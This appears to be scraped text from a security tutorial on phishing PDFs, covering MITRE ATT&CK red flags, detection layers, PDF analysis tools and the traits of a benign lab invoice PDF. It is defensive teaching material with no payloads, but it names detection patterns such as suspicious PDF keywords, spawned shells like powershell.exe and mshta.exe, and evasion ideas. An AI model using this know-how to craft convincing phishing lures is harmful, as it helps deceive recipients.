T1027 — Obfuscated Files or InformationLinks going through bit.ly, tinyurl, or multi-hop redirects to obscure the final destination. Legitimate invoices use direct corporate URLs.
T1608.005 — Link TargetDid the recipient expect this invoice? Unsolicited financial documents are the most common phishing vector in enterprise environments.
T1566.001 — Spearphishing AttachmentUnderstanding detection helps you appreciate both sides — what attackers try to evade and what defenders rely on. Here's how each layer of the security stack handles PDF threats.
Static Analysis: Scans PDF structure for /JavaScript, /Launch, /OpenAction, /EmbeddedFile keywords. Your lab PDF passes this — it only has /URI.
URL Reputation: Extracts all URLs and checks against threat intel feeds. A link to putty.org is clean; a link to putty-secure[.]download would be flagged.
Sandbox Detonation: Opens the PDF in a headless VM, watches for process spawning, network callbacks, file drops. Your PDF just renders text — nothing detonates.
Process Chain: Monitors if PDF reader spawns child processes (cmd.exe, powershell.exe, mshta.exe). Your PDF opens a browser — normal behavior for URI clicks.
Behavioral Rules: YARA rules flag PDFs calling WinExec, ShellExecute, or containing ROP gadgets. Your PDF has none of these.
Memory Scanning: Detects heap sprays (NOP sleds in streams), shellcode patterns, and exploit signatures at runtime.
pdfid.py: Quick triage — counts suspicious keywords. Zero /JS, /Launch, /OpenAction = low risk. Try it on your generated PDF!
pdf-parser.py: Deep dive — dumps every object, decodes streams, follows references. Shows the full object tree.
peepdf: Interactive analysis — JavaScript extraction, shellcode detection, object graph visualization.
Online Sandboxes: Upload to any.run, hybrid-analysis.com, or VirusTotal to see multi-engine detection results.
No executable code: Zero JavaScript, no embedded executables, no launch actions.
Transparent link: A visible /URI pointing to a known-good domain. Users choose to click; nothing auto-executes.
Clean structure: Minimal PDF objects — page, font, text streams, one annotation. No obfuscation, no encoded streams hiding payloads.
Social engineering only: The "attack" is the convincing design and the call-to-action. This is why human awareness training is essential — technology can't flag a well-crafted invoice with a legitimate link.
Quick reference for every technical term used in this tutorial. Terms are grouped by category. Use Ctrl+F to search for a specific term.
0x90) instructions that acts as a "landing pad" — execution slides through until it reaches the shellcode.0xDEADBEEF → EF BE AD DE in memory.Primary sources, research papers, and recommended resources for deeper study. Every claim in this tutorial can be traced to these references.